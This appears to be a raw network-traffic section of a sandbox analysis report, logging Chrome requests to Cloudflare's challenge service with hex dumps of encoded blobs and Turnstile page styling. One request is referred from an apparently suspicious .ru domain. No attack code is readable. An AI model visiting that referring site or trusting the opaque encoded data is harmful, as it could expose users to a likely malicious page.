                                                                                                2025-01-08 13:48:19 UTC1369INData Raw: 67 47 6d 50 64 6e 71 53 74 4b 57 71 72 4a 32 50 74 72 79 39 6c 63 4a 39 66 6e 2b 54 6e 4a 76 48 68 36 4b 72 6f 63 69 6c 72 64 53 78 71 64 48 47 6d 61 6a 4b 33 5a 43 66 71 4b 33 55 6e 72 62 44 75 4c 79 7a 30 73 57 7a 74 4e 37 66 35 71 2f 50 72 75 36 6d 35 2b 44 73 30 75 33 44 7a 4d 76 33 75 39 50 5a 36 2f 76 58 38 64 6e 39 37 39 6a 56 2f 50 63 4f 42 4f 2f 63 41 74 6b 53 30 68 55 4a 43 51 62 79 38 74 6a 77 48 75 55 61 38 78 45 56 2f 50 63 6d 39 43 6a 35 42 79 62 7a 2f 50 73 70 39 77 45 79 42 6a 45 43 45 41 49 33 46 43 6f 4f 4f 76 6f 39 4d 54 63 75 47 78 73 42 47 51 38 34 4a 52 55 36 48 69 6b 67 4f 69 4a 47 4f 43 6f 75 4a 68 4d 6f 4a 6c 4d 4f 56 68 63 62 4d 52 77 30 50 54 5a 59 4f 52 38 57 57 68 68 59 49 45 46 6e 61 56 70 48 54 56 31 70 61 6c 78 45 51 6b 30
                                                                                                Data Ascii: gGmPdnqStKWqrJ2Ptry9lcJ9fn+TnJvHh6KrocilrdSxqdHGmajK3ZCfqK3UnrbDuLyz0sWztN7f5q/Pru6m5+Ds0u3DzMv3u9PZ6/vX8dn979jV/PcOBO/cAtkS0hUJCQby8tjwHuUa8xEV/Pcm9Cj5Bybz/Psp9wEyBjECEAI3FCoOOvo9MTcuGxsBGQ84JRU6HikgOiJGOCouJhMoJlMOVhcbMRw0PTZYOR8WWhhYIEFnaVpHTV1palxEQk0
                                                                                                2025-01-08 13:48:19 UTC1369INData Raw: 72 65 4d 6b 35 6d 2f 6b 4a 65 64 66 4a 53 62 6f 59 53 59 6e 36 57 4d 6e 4b 4f 71 6e 4b 2b 4a 6e 37 32 66 70 36 36 6a 7a 4d 6d 31 6d 38 7a 57 77 4b 33 52 7a 2b 58 50 35 4c 6e 44 75 65 4f 35 74 75 32 33 77 4d 2f 73 75 73 47 2b 35 39 54 4c 30 72 44 36 7a 4e 58 72 39 64 44 50 39 63 76 4e 30 51 58 6a 30 63 6a 6e 41 2f 4d 46 39 77 77 4e 37 64 73 43 43 2f 34 4e 36 78 44 71 36 4f 54 56 32 52 2f 6f 33 41 6b 6a 47 43 4d 4f 47 2b 2f 35 47 43 76 71 43 50 37 37 49 53 73 76 4c 43 2f 2b 48 75 63 70 4a 42 6b 47 42 76 55 4a 43 6a 45 36 46 7a 59 35 4e 6a 45 36 50 54 6c 46 50 6b 45 39 2f 6b 4a 46 51 53 64 47 53 55 56 42 53 6b 31 45 53 44 5a 46 47 30 6c 53 56 55 77 5a 51 46 73 68 54 56 64 57 59 44 77 34 59 31 74 65 4f 6d 67 35 59 6a 35 64 50 57 5a 43 5a 57 4a 6e 53 6b 67 79
                                                                                                Data Ascii: reMk5m/kJedfJSboYSYn6WMnKOqnK+Jn72fp66jzMm1m8zWwK3Rz+XP5LnDueO5tu23wM/susG+59TL0rD6zNXr9dDP9cvN0QXj0cjnA/MF9wwN7dsCC/4N6xDq6OTV2R/o3AkjGCMOG+/5GCvqCP77ISsvLC/+HucpJBkGBvUJCjE6FzY5NjE6PTlFPkE9/kJFQSdGSUVBSk1ESDZFG0lSVUwZQFshTVdWYDw4Y1teOmg5Yj5dPWZCZWJnSkgy
                                                                                                2025-01-08 13:48:19 UTC1369INData Raw: 47 35 76 34 47 58 6d 73 43 38 77 63 7a 4b 6c 35 33 46 7a 4a 79 67 6e 73 65 30 71 63 6d 74 75 4b 2b 32 75 64 36 77 34 4e 53 69 76 37 69 37 34 74 58 42 35 4b 6a 42 33 62 33 76 76 61 37 62 7a 63 62 69 79 36 7a 4a 36 37 62 78 7a 62 76 4a 35 75 73 43 37 2f 44 37 2b 4e 2f 33 32 63 45 42 39 67 54 6e 32 4e 66 65 42 67 7a 4e 34 2b 59 4e 44 77 34 5a 7a 2b 50 72 31 68 72 61 39 65 6b 51 44 50 55 6c 45 4f 48 34 41 78 6a 6b 2b 67 63 6f 49 67 45 4c 4a 50 41 50 44 7a 55 4c 42 77 51 77 4e 51 6f 2b 2b 50 63 56 48 51 45 74 47 55 59 50 49 52 38 53 49 67 4d 65 54 45 51 37 4a 78 74 4d 55 53 6b 75 4e 79 59 79 45 45 67 36 4f 43 63 64 57 54 70 53 50 6c 5a 41 48 46 6b 30 4e 7a 56 6b 49 6b 63 34 53 30 5a 44 63 6a 6f 77 53 6c 46 6f 59 45 74 45 57 6d 4e 52 66 57 67 38 54 31 78 57 66
                                                                                                Data Ascii: G5v4GXmsC8wczKl53FzJygnse0qcmtuK+2ud6w4NSiv7i74tXB5KjB3b3vva7bzcbiy6zJ67bxzbvJ5usC7/D7+N/32cEB9gTn2NfeBgzN4+YNDw4Zz+Pr1hra9ekQDPUlEOH4Axjk+gcoIgELJPAPDzULBwQwNQo++PcVHQEtGUYPIR8SIgMeTEQ7JxtMUSkuNyYyEEg6OCcdWTpSPlZAHFk0NzVkIkc4S0ZDcjowSlFoYEtEWmNRfWg8T1xWf
                                                                                                2025-01-08 13:48:19 UTC1369INData Raw: 71 6d 4c 79 45 7a 71 47 4b 6f 63 71 67 78 61 6e 56 73 4e 6a 58 7a 61 6a 4f 78 39 2b 78 71 74 54 63 73 72 4b 64 30 74 43 31 78 73 6a 4a 70 62 58 59 31 2b 54 6f 30 4e 44 42 35 4f 44 58 35 2f 6a 72 79 66 43 39 37 64 51 41 37 2b 44 57 33 39 55 41 38 66 67 41 36 4e 38 4f 32 74 33 69 32 75 33 77 37 42 62 70 44 65 6e 32 47 66 66 36 2b 66 34 66 2f 42 51 43 45 66 4c 79 39 68 63 47 48 76 6f 4c 43 69 48 6c 47 78 6e 35 4b 54 41 55 45 43 41 58 42 53 6e 77 4f 77 37 32 44 6a 63 4e 4d 68 5a 43 48 55 56 45 4f 68 55 37 4e 45 77 65 46 30 46 4a 4c 55 51 7a 4d 79 51 65 56 55 63 34 54 44 63 35 52 54 77 6d 52 30 6b 61 4c 68 30 79 4c 6b 5a 69 50 46 6c 6c 61 7a 35 63 54 6e 42 45 54 56 78 74 52 55 35 58 52 6b 78 35 61 48 4a 6c 53 6c 74 64 58 31 42 54 5a 47 4e 66 54 6e 46 6f 66 56
                                                                                                Data Ascii: qmLyEzqGKocqgxanVsNjXzajOx9+xqtTcsrKd0tC1xsjJpbXY1+To0NDB5ODX5/jryfC97dQA7+DW39UA8fgA6N8O2t3i2u3w7BbpDen2Gff6+f4f/BQCEfLy9hcGHvoLCiHlGxn5KTAUECAXBSnwOw72DjcNMhZCHUVEOhU7NEweF0FJLUQzMyQeVUc4TDc5RTwmR0kaLh0yLkZiPFllaz5cTnBETVxtRU5XRkx5aHJlSltdX1BTZGNfTnFofV
                                                                                                2025-01-08 13:48:19 UTC1369INData Raw: 69 61 2b 39 6f 62 4b 2b 74 72 58 4d 74 37 71 70 79 4d 65 38 72 62 72 67 77 4d 47 64 30 4d 58 62 34 4e 4c 49 79 63 62 50 7a 4d 2b 36 30 4e 44 52 38 4e 2f 55 78 64 72 69 32 4c 54 77 32 75 6e 4e 34 75 4c 68 34 66 7a 78 35 65 55 42 35 75 6a 45 43 51 33 73 42 41 33 78 38 4f 45 46 41 66 58 31 30 66 6a 34 2b 2b 62 38 2f 75 30 44 2f 67 48 63 2f 67 55 47 39 51 63 49 46 76 6b 5a 44 51 34 4f 36 52 77 52 37 41 38 68 46 51 59 54 4f 52 6e 30 4b 52 38 65 48 6a 30 72 49 68 4a 42 4d 43 55 6f 45 79 6f 71 4b 69 73 33 4c 52 35 4a 4e 44 4d 69 4d 30 42 43 4a 6b 56 44 4f 53 6f 33 50 6a 34 2b 51 30 31 42 4d 6c 56 6c 52 6a 5a 44 56 6b 6f 36 59 56 68 4e 54 69 70 50 55 31 51 2f 56 56 59 78 62 56 74 5a 63 47 6c 65 58 6b 35 78 67 57 4a 53 63 57 4e 6c 66 47 74 30 61 6b 56 35 62 33 70
                                                                                                Data Ascii: ia+9obK+trXMt7qpyMe8rbrgwMGd0MXb4NLIycbPzM+60NDR8N/Uxdri2LTw2unN4uLh4fzx5eUB5ujECQ3sBA3x8OEFAfX10fj4++b8/u0D/gHc/gUG9QcIFvkZDQ4O6RwR7A8hFQYTORn0KR8eHj0rIhJBMCUoEyoqKis3LR5JNDMiM0BCJkVDOSo3Pj4+Q01BMlVlRjZDVko6YVhNTipPU1Q/VVYxbVtZcGleXk5xgWJScWNlfGt0akV5b3p
                                                                                                2025-01-08 13:48:19 UTC1369INData Raw: 63 71 6d 31 63 57 6f 79 35 53 35 30 71 37 64 7a 62 47 32 31 63 47 69 73 73 54 4c 78 64 6a 6f 79 2b 57 36 30 4e 7a 51 78 64 58 67 78 63 72 34 32 4e 6e 6f 2b 64 66 76 37 50 7a 66 2b 63 37 6b 35 50 7a 42 43 65 44 61 32 65 7a 34 33 65 49 52 37 76 49 4e 36 65 38 4c 47 52 50 31 30 2b 37 79 43 42 50 5a 48 67 37 78 39 68 59 45 43 50 49 45 44 41 72 32 4c 51 7a 2b 2f 67 6f 65 41 66 55 6d 42 53 30 35 45 53 59 4b 45 7a 6f 71 44 66 30 79 48 79 51 50 48 43 67 6c 53 55 6b 6e 47 78 73 69 4f 68 31 4e 51 69 46 4a 56 54 4a 43 4a 44 4e 57 4c 44 6c 49 46 54 30 74 4c 31 49 78 57 57 55 36 55 6a 56 55 49 55 6b 35 4f 32 70 61 50 56 77 70 55 56 46 44 5a 6b 56 74 65 55 39 6d 53 57 67 31 58 56 31 50 66 6d 35 52 63 44 31 6c 65 31 64 36 57 59 47 4e 5a 48 70 64 66 45 6c 78 68 32 4f 53
                                                                                                Data Ascii: cqm1cWoy5S50q7dzbG21cGissTLxdjoy+W60NzQxdXgxcr42Nno+dfv7Pzf+c7k5PzBCeDa2ez43eIR7vIN6e8LGRP10+7yCBPZHg7x9hYECPIEDAr2LQz+/goeAfUmBS05ESYKEzoqDf0yHyQPHCglSUknGxsiOh1NQiFJVTJCJDNWLDlIFT0tL1IxWWU6UjVUIUk5O2paPVwpUVFDZkVteU9mSWg1XV1Pfm5RcD1le1d6WYGNZHpdfElxh2OS


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                23192.168.2.549751104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:19 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1458064514:1736343034:52qvS4QZlucpCjw1o58GpHxbb9QYG5bJ4eBnVmkvgEM/8feca4d8fcf5c334/1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59r HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:20 UTC379INHTTP/1.1 404 Not Found
                                                                                                Date: Wed, 08 Jan 2025 13:48:19 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 7
                                                                                                Connection: close
                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                cf-chl-out: 7uced0iXIOE9beOhMYO7XuFX/wx812gx2wI=$p4CQ0BQVhwIuugO7
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca500b8f40f88-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:20 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                Data Ascii: invalid


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                24192.168.2.550028104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:19 UTC800OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: navigate
                                                                                                Sec-Fetch-Dest: iframe
                                                                                                Referer: https://ppx.musicstrevbng.ru/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:20 UTC1362INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:50:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 26657
                                                                                                Connection: close
                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                cross-origin-opener-policy: same-origin
                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                origin-agent-cluster: ?1
                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                referrer-policy: same-origin
                                                                                                document-policy: js-profiling
                                                                                                2025-01-08 13:50:20 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 63 61 37 65 65 66 61 66 30 34 32 62 62 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8feca7eefaf042bb-EWRalt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:50:20 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                2025-01-08 13:50:20 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                2025-01-08 13:50:20 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                2025-01-08 13:50:20 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                2025-01-08 13:50:20 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                2025-01-08 13:50:20 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                2025-01-08 13:50:20 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                2025-01-08 13:50:20 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                2025-01-08 13:50:20 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
